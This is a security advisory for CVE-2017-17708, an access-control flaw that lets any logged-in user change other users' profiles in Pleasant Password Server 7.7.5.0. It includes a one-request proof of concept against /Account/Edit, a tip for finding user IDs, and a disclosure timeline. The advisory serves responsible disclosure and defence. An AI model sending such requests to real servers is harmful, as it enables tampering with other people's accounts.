Profundis Labs - Security Advisory Vulnerablity Title ================== Unauthorized write access to profile data of other users Vendor: ======= Pleasant Solutions Inc (http://pleasantsolutions.com/) Product: ======== Pleasant Password Server Pleasant Password Server is an award-winning multi-user password management tool compatible with "KeePass Password Safe" and Bruce Schneier's "Password Safe", the most popular password management systems in the world. (Source: http://pleasantsolutions.com/passwordserver/) Affected Versions: ================== Version 7.7.5.0 (lower versions not tested) Vulnerability Type: =================== Incorrect Access Control CVE Reference: ============== CVE-2017-17708 VENDOR Reference: ================= https://info.pleasantsolutions.com/Documentation/Pleasant_Password_Server/Z._Release_Notes/007.008.003 Vendor Reference Number: n.a. Vulnerability Details: ====================== Because of insufficient authorization checks it is possible for any authenticated user to change profile data of other users. PoC code(s): ============ POST /Account/Edit HTTP/1.1 Host: :10001 __RequestVerificationToken=&Id=&DisplayName=&Email=&Phone=&Language= Valid user IDs can be obtained by function "User Access" -> "Add Access for User". The option box includes user id values for existing users. Remark: Values in angle brackets are placeholders. Disclosure Timeline: ==================== Vendor Notification: 12/19/2017 Vendor Confirmation: 12/20/2017 Vendor Patch Release: 03/01/2018 Public Disclosure: 06/22/2018 Severity Level: =============== 6.5 (Medium) CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N Description: ============ Request Method(s): [+] HTTP POST Vulnerable Product: [+] Pleasant Password Server 7.7.5.0 Vulnerable Parameter(s): [+] Id Authentication (Role): [+] User =========================================================== [+] Author: Philipp Rocholl [+] Website: https://www.profundis-labs.com [+] Source: https://profundis-labs.com/advisories/CVE-2017-17708.txt [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of security related information.